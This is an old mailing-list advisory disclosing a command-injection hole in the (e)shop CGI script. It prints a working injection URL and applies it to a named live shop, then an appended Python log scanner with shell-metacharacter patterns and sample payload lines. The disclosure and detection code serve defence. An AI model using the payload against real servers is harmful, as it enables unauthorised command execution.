From: Kernel|X| (securepunkass.com)
Date: Sat Sep 15 2001 - 19:44:51 CDT

                        ------------[ advisory ]------------

    name: (e)shop Online-Shop System

    author:
    WEBDISCOUNT, Inh. Michael Boehme

    Problem:
    Script doesn't check for symbol ";". Any user
    can execute any *nix commands on webserver.

    exploit:
    host/cgi-bin/eshop.pl?seite=;ls|

    ex.
    http://www.azl-mobilfunk.com/cgi-bin/eshop.pl?seite=;ls|

    Bug found by Kernel|X|
     [ twisted metal ]

    E-Mail: [securepunkass.com]
            [kernelxtmgroup.sh]
    WWW: [ www.tmgroup.sh ]

    ------------
    Thank you for using Anonymous mail system! message sent from www.tmgroup.sh
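
A defender-side check for the request pattern this advisory describes, added here as an example that is not part of the original post: it scans web server access logs for eshop.pl requests whose seite parameter carries shell metacharacters, including percent-encoded and double-encoded forms. The log format, the sample lines, and the function names are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, unquote

# Characters a shell treats specially; none belongs in a page-name parameter.
SHELL_META = re.compile(r"[;|&`$<>(){}\\\n\r\x00]")
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input (%253B) is still seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_seite(log_line, script="eshop.pl", param="seite"):
    """Return the decoded parameter value if it holds shell metacharacters, else None."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.endswith("/" + script):
        return None
    # Split on "&" by hand: some query parsers also split on ";", which would
    # hide the very character this check looks for.
    for pair in url.query.split("&"):
        key, _, raw = pair.partition("=")
        if unquote(key) == param:
            value = decode_fully(raw)
            if SHELL_META.search(value):
                return value
    return None

def scan(lines):
    """Return (line_number, decoded_value) for every flagged request."""
    checked = ((n, suspicious_seite(line)) for n, line in enumerate(lines, 1))
    return [(n, v) for n, v in checked if v is not None]

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [15/Sep/2001:19:40:01 -0500] "GET /cgi-bin/eshop.pl?seite=index.html HTTP/1.0" 200 512',
    '192.0.2.11 - - [15/Sep/2001:19:41:12 -0500] "GET /cgi-bin/eshop.pl?seite=;ls| HTTP/1.0" 200 2048',
    '192.0.2.12 - - [15/Sep/2001:19:42:30 -0500] "GET /cgi-bin/eshop.pl?seite=%3Bls%7C HTTP/1.0" 200 2048',
    '192.0.2.13 - - [15/Sep/2001:19:43:05 -0500] "GET /cgi-bin/eshop.pl?seite=%253Bls%257C HTTP/1.0" 200 311',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit in the logs shows only that such a request was made; whether the command ran depends on how the script uses the value.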